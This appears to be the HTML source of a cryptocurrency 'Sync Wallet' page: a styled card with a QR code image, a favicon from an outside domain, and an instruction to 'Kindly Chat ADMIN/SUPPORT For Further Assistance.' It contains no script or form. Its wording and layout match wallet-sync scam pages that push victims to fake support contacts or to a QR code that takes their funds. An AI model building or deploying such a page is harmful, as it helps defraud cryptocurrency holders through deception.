

<html lang="en">

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <link href="./Qr -code Wallet_files/css" rel="stylesheet">
        <link rel="shortcut icon" href="https://digitalbytesyncs.online/images/favicon.png">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <title>Qr -code Wallet</title>
        <script type="6a7a27674afec85f9f2381f1-text/javascript"></script>
        <style>
            body {
                margin: 0;
                font-size: 1rem;
                font-family: 'Roboto', Helvetica, sans-serif;
                line-height: 1.5;
                background: #1D2840 url(' ./bg-pattern.svg') no-repeat top center;
                box-sizing: border-box;
            }
    
            .container {
                height: 100vh;
                display: flex;
                justify-content: center;
                align-items: center;
                padding-right: 15px;
                padding-left: 15px;
                margin-right: auto;
                margin-left: auto;
            }
    
            .card {
                width: 100%;
                max-width: 420px;
                padding: 30px;
                color: #1D2840;
                background: #fff;
                border-radius: 10px;
            }
    
            .card-header {
                margin-bottom: 30px;
                text-align: center;
            }
    
            .card-header h3 {
                font-size: 20px;
                margin: 15px 0 0;
            }
    
            .card-header p {
                color: #353f52;
                margin: 0 15px 10px;
                font-size: 14px;
            }
    
            .form-group {
                margin-bottom: 20px;
            }
    
            label {
                display: block;
                font-size: 14px;
                font-weight: 600;
                margin-bottom: .5rem;
            }
    
            .form-control {
                color: #353f52;
                display: block;
                width: 100%;
                height: 44px;
                width: 100%;
                padding: .375rem .75rem;
                font-size: 14px;
                border: 1px solid #e3ebf6;
                border-radius: .35rem;
                box-sizing: border-box;
                outline: 0;
            }
    
            .form-control::placeholder {
                color: #353f52;
            }
    
            .button {
                display: block;
                width: 100%;
                height: 44px;
                padding: .375rem .75rem;
                color: #fff;
                background: #3692fe;
                font-size: 16px;
                margin-top: 30px;
                text-align: center;
                border: 1px solid #3692fe;
                border-radius: .35rem;
                box-sizing: border-box;
                cursor: pointer;
                outline: 0;
            }
        </style>
    </head>
    
    <body>
        <div class="container">
            <div class="card">
                <div class="card-header">
                    <h3>Sync Wallet</h3>
                    <p>Kindly Chat ADMIN/SUPPORT For Further Assistance.</p>
                    <img src="./nextfiles/qrcode.63417753.png" width="320px" height="333px">
                </div>
            </div>
        </div>
    
    </body>
    
    </html>